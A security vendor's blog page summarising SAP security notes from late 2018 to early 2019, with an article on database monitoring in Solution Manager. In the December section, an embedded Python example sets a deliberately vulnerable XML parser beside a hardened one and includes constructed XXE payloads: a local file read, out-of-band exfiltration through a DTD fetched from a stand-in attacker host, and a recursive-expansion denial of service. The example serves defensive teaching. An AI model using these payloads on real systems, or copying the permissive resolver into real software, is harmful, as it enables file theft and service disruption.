Layer Seven Security

SAP Security Notes, February 2019

Hot News Note 2742027 patches a critical broken authentication check in SAP HANA Extended Application Services, advanced model (HANA XS Advanced). The vulnerability could lead to unauthorized administrative access and the exfiltration, modification or deletion of sensitive data in HANA XS Advanced. It carries a CVSS score of 9.4/10: attack complexity is low and no privileges are required in the target system. HANA XS Advanced should be upgraded to the patch level specified in the Note to address the risk. The Note includes manual instructions for a workaround if an upgrade is not possible. The workaround removes the affected OIDC component; a side-effect is the deactivation of X.509-based or SPNEGO single sign-on for HANA users.

Note 2070691 deals with a high priority information disclosure vulnerability in the SAP Solution Tools Plug-In (ST-PI) that could lead to the leakage of sensitive data, including configuration data and user passwords. The disclosed information can be used to perform targeted attacks against the database servers of SAP systems.

Note 2729710 includes a correction for a missing XML validation vulnerability in the System Landscape Directory (SLD). With the correction, the SLD no longer processes XML documents that declare XML External Entities (XXE). Without it, a crafted document could cause the SLD to loop indefinitely (a denial of service), read arbitrary files on the host, or send local files to an attacker-controlled destination.

Cyber Espionage Warning: 30% Growth in Targeted Attacks

The findings of the annual Internet Security Threat Report indicate that the number of organizations targeted by advanced hacking groups increased by almost one third between 2015 and 2018. The groups have not only substantially increased their cyber-espionage operations, they are also deploying increasingly sophisticated tactics against a growing number of sectors. National hacking groups such as Chafer and cross-national groups such as Dragonfly are conducting highly targeted campaigns to gather intelligence and exfiltrate data from organizations.

Chafer is linked to the use of leaked NSA exploits and is credited for several attacks against telecoms and transportation companies and their supply chains. Dragonfly has targeted primarily energy and utility companies including infiltrating the control systems of power supply systems. Other groups such as Gallmaker have been responsible for attacks against government institutions and military organizations.

Hacking groups are no longer relying solely on malware delivered through spear-phishing or other exploits to carry out attacks. Rather, they are using publicly available tools to execute targeted cyber-espionage campaigns. This includes tools such as Metasploit, which provides utilities for exploit development and deployment and includes numerous modules for SAP exploits. Approximately 39 percent of intrusions in 2017 did not deploy any malware. The use of publicly available tools with legitimate purposes can obfuscate attacks and hinder detection.

Despite the growing sophistication of attacks, the 2019 Global Threat Report found that average breakout times across all intrusions and threat actors more than doubled between 2017 and 2018, from 1 hour and 58 minutes to 4 hours and 37 minutes. The breakout metric measures the average time taken by attackers to escalate or propagate an initial compromise to other targets in a network. The increase in breakout time suggests that organizations are more effectively hardening potential targets against exploits and detecting and isolating attacks. However, the overall average masks substantial differences between threat actors. Russian threat actors have an average breakout time of just 18 minutes and 49 seconds, which means organizations typically have under 20 minutes to discover and contain attacks from Russian hacking groups. Average breakout times are lowest for Russian, North Korean and Chinese hacking groups and highest for cyber criminals.

Successfully detecting and containing cyber intrusions relies not only on speed of detection but also on speed of response. Real-time or near-real-time threat detection should therefore be supported by effective incident response mechanisms to investigate security breaches. SAP Solution Manager provides an integrated platform for both threat detection and incident response. SolMan connects directly to event logs in SAP systems as often as every 5 minutes to detect and alert on security breaches. It also provides automated procedures for investigating and tracking incident response. To learn more, contact Layer Seven Security.

SAP Security Notes, January 2019

Hot News Note 2696233 deals with multiple vulnerabilities in the SAP Cloud Connector. The Connector is an agent that connects on-premise systems with applications operating on the SAP Cloud Platform. The agent supports HTTP, RFC, JDBC/ODBC and other connections between on-premise and cloud installations using reverse invoke, so no inbound ports need to be opened in on-premise network firewalls. The Connector is therefore designed to support secure cloud-to-on-premise connectivity, which makes a missing authentication check in the agent itself particularly serious. Note 2696233 patches a missing authentication vulnerability in the SAP Cloud Connector with a CVSS score of 9.3/10. It also addresses a lower-risk code injection vulnerability that could lead to information disclosure or a denial of service in the Connector. Customers are advised to upgrade to SAP Cloud Connector 2.11.3 to remove the vulnerabilities.

Hot News Note 2727624 includes corrections for a critical information disclosure vulnerability in SAP Landscape Management. Landscape Management supports system cloning, copying, refreshing and other system administration tasks. The vulnerability addressed by Note 2727624 could be exploited by attackers to steal user credentials. Since applying the correction does not remove credentials already written to logs, the note also recommends deleting the affected log entries and changing the passwords of any system users whose credentials may have been disclosed in them.

Other high priority notes include Note 2727623, which removes a missing authorization check in SAP BW/4HANA, and Note 2724788, which tackles various vulnerabilities in the Adobe PDF Print Library.

Database Security with the Cybersecurity Extension for SAP

Protecting SAP systems against cyber threats requires integrated measures applied not just within the SAP layer but across the technology stack, including network, operating system and database components. As repositories of business-critical and sensitive information, databases warrant specific attention in hardening and monitoring efforts. This includes identifying and addressing configuration weaknesses, excessive privileges and weak audit policies, encrypting data in transit and at rest, removing vulnerable stored procedures, and detecting and responding to privilege abuse or escalation.

SAP Solution Manager is uniquely positioned to monitor the security of SAP databases given its deep connectivity into SAP platforms. This article outlines the architecture and data collection procedures for database monitoring with Solution Manager. Next month’s article will explore database-level security reporting and event monitoring with SolMan.

Establishing connectivity to databases supporting SAP systems is a standard step during the mandatory configuration procedures for Solution Manager. Connection information is entered into the DB Parameters section during the Enter System Parameters step of Managed System Configuration. This includes the database host, port, and user credentials.

The connection supports the DBA Cockpit for database administration and monitoring. It also supports the database extractors used by the Extractor Framework. The Extractor Framework performs data collection and distribution for monitoring and alerting in Solution Manager. The framework operates regular extractors to snapshot configuration, user, system, change and event-related data from managed systems. The snapshots are stored in areas such as the SolMan Configuration and Change Database (CCDB) and queried by other applications in SolMan, including Configuration Validation and the Monitoring and Alerting Infrastructure (MAI). Solution Manager has no concept of running or scheduling security scans: periodic jobs run the extractors to refresh the data, so there is no need to schedule scans or connect directly to systems to compile data when reviewing security-related information. Job Monitoring in Solution Manager can be used to monitor the relevant jobs and alert on job errors or warnings.

Solution Manager automatically applies preconfigured templates for databases once they are successfully connected for monitoring. SolMan installations are packaged with templates for all platforms supported by SAP systems including SAP databases such as HANA, Sybase and MaxDB, and third-party databases from Oracle, IBM and Microsoft. Template contents can vary based on the specific version and release of databases.

Templates for HANA platforms include metrics and alerts for monitoring system availability, performance and security. They also include CCDB stores that extract current values for HANA parameters, as well as details of active users, audit policies and users holding critical database and system privileges.

The extractor framework and SAP-delivered templates may not cover every security-related area for each database platform. Customers or partners can therefore define their own templates, or create or modify extractors, metrics, alerts and CCDB stores to extract additional data. In the example below, we've added several custom stores to extract and query data for Sybase ASE that is not available in a standard Solution Manager installation. This includes runtime values for all Sybase parameters, active users, roles assigned to database users, enabled stored procedures, audit settings, and database event logs with event IDs, user IDs and timestamps.

The stores are assigned to the custom /L7S/ namespace to avoid any conflict with SAP and other namespaces.

The extractor framework regularly refreshes the data through background jobs. Database security policies are then applied by Solution Manager against the CCDB to identify vulnerabilities and security-related events in the platform. The data is also monitored by the MAI which triggers alerts and notifications for critical risks. The results are replicated to an internal Business Warehouse (BW) in Solution Manager.

In next month's article, we will discuss how you can use Service Level Reporting and BusinessObjects to create detailed and user-friendly reports to convey the results of database security monitoring with SAP Solution Manager.

SAP Security Notes, December 2018

Hot News Note 2711425 patches a critical Cross-Site Scripting (XSS) vulnerability in SAP Hybris Commerce storefronts. The vulnerability could be exploited by attackers to modify web content and compromise user authentication data. It affects versions 6.2 through 6.7 and 18.08 of SAP Hybris Commerce, including all but the latest patch releases. The vulnerability carries a CVSS v3.0 base score of 9.3/10 and scores particularly high in terms of impact to confidentiality and integrity. Attack complexity is low and no privileges are required in the target system. In addition to applying the automated updates referenced in Note 2711425, manual steps may be required to remove the vulnerability where custom HTTP headers are used for caching, where SAP Hybris Commerce is positioned behind an HTTP reverse proxy or load balancer, or where the system is used in conjunction with a content delivery network (CDN).

Note 2642680 deals with a high-risk XML External Entity (XXE) vulnerability in SAP NetWeaver Application Server Java (AS Java) caused by missing validation of XML documents received from untrusted sources. The vulnerability could allow attackers to read files from the application server's file system or to provoke a denial of service.
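The two XXE corrections on this page (Note 2729710 for the SLD, above, and Note 2642680 for AS Java, here) come down to the same parser-level rule: XML from an untrusted source must not be allowed to declare or resolve entities. The following is an added example written for this page; it is not SAP's code and not the content of either note. It uses Python's standard-library expat parser to pair a deliberately permissive parser, which resolves file:// entities the way a lax entity resolver does, with a hardened parser that refuses any DOCTYPE, entity declaration or external reference, and runs constructed payloads for the three outcomes the notes describe: local file read, out-of-band exfiltration via a parameter entity, and recursive expansion. The sample documents, the temporary "secret" file, the function names and the host attacker.example are all constructed for the example.

```python
"""XXE: a permissive parser beside a hardened one, standard library only.

Everything here is constructed for illustration: the documents, the
'secret' file and the attacker host are not taken from any SAP system.
"""
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse


class UnsafeXML(Exception):
    """Raised when an untrusted document tries to use a DTD or entity."""


def _collect_text(parser):
    """Attach a character-data handler and return the list it fills."""
    chunks = []
    parser.CharacterDataHandler = chunks.append
    return chunks


def naive_parse(data: bytes) -> str:
    """Vulnerable: fetches file:// external entities referenced in the document.

    This mimics an entity resolver that dereferences whatever system id the
    DTD names; the file content is parsed as the entity's replacement text.
    """
    parser = expat.ParserCreate()
    chunks = _collect_text(parser)

    def fetch_external(context, base, system_id, public_id):
        url = urlparse(system_id)
        if url.scheme == "file":
            with open(url.path, "rb") as fh:
                body = fh.read()
            # The child parser shares the parent's handlers, so the file
            # content is delivered to `chunks` as ordinary character data.
            child = parser.ExternalEntityParserCreate(context)
            child.Parse(body, True)
        return 1  # non-zero: keep parsing

    parser.ExternalEntityRefHandler = fetch_external
    parser.Parse(data, True)
    return "".join(chunks)


def hardened_parse(data: bytes) -> str:
    """Safe: rejects any DOCTYPE, entity declaration or external reference."""
    parser = expat.ParserCreate()
    chunks = _collect_text(parser)
    # Never load parameter entities; they are the vector for out-of-band exfiltration.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # A DTD is the only place entities can be declared: refuse it outright.
        raise UnsafeXML(f"DOCTYPE not permitted (root={name!r}, system id={system_id!r})")

    def reject_entity(name, is_param, value, base, system_id, public_id, notation):
        raise UnsafeXML(f"entity declaration not permitted: {name!r}")

    def reject_external(context, base, system_id, public_id):
        raise UnsafeXML(f"external entity reference not permitted: {system_id!r}")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external
    parser.Parse(data, True)
    return "".join(chunks)


def write_secret_file(content: str = "db_password=hunter2") -> str:
    """Create a constructed 'sensitive' file for the file-read demonstration."""
    fd, path = tempfile.mkstemp(suffix=".cfg")
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    return path


def sample_documents(secret_path: str) -> dict:
    """Constructed payloads covering the outcomes the notes describe."""
    return {
        "benign": b"<sld><system sid='PRD'>host01</system></sld>",
        # Read an arbitrary local file and reflect it into the parsed text.
        "file_read": (
            b"<!DOCTYPE x [<!ENTITY xxe SYSTEM 'file://" + secret_path.encode() + b"'>]>"
            b"<x>&xxe;</x>"
        ),
        # Send a local file to an attacker host via a parameter entity (out-of-band).
        "exfil": (
            b"<!DOCTYPE x [<!ENTITY % f SYSTEM 'file:///etc/hostname'>"
            b"<!ENTITY % dtd SYSTEM 'http://attacker.example/evil.dtd'>%dtd;]><x/>"
        ),
        # Recursive expansion: the 'continuous loop' / denial-of-service variant.
        "billion_laughs": (
            b"<!DOCTYPE x [<!ENTITY a 'aaaaaaaaaa'>"
            b"<!ENTITY b '&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;'>"
            b"<!ENTITY c '&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;'>]><x>&c;</x>"
        ),
    }


def classify(secret_path: str) -> dict:
    """Run every sample through the hardened parser; map name -> 'ok' or 'rejected'."""
    results = {}
    for name, doc in sample_documents(secret_path).items():
        try:
            hardened_parse(doc)
            results[name] = "ok"
        except UnsafeXML:
            results[name] = "rejected"
    return results


def demo() -> tuple:
    """Create the secret file, run both parsers, clean up; returns (leaked, verdicts)."""
    path = write_secret_file()
    try:
        leaked = naive_parse(sample_documents(path)["file_read"])
        verdicts = classify(path)
    finally:
        os.unlink(path)
    return leaked, verdicts


if __name__ == "__main__":
    leaked, verdicts = demo()
    print("naive parser leaked:", leaked)
    print("hardened parser verdicts:", verdicts)
```

Run it directly to see the file contents leaked through the permissive parser and the per-payload verdicts from the hardened one; only the benign document parses. Refusing the DOCTYPE outright is the expat equivalent of enabling the Xerces feature http://apache.org/xml/features/disallow-doctype-decl on a Java DocumentBuilderFactory, which is the usual control for AS Java applications. Where an application legitimately needs a DTD, the narrower controls are the entity-declaration and external-reference handlers shown above together with parameter-entity parsing left off; the recursive-expansion payload is never run through the permissive parser here because its only purpose is to exhaust the parser.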

Note 2658279 patches an insufficient authorization check impacting the AS Java keystore service.

Note 2698996 removes a missing authorization check in SAP Customizing Tools. The note introduces an authorization check on object S_RFC_ADM to prevent an escalation of privileges.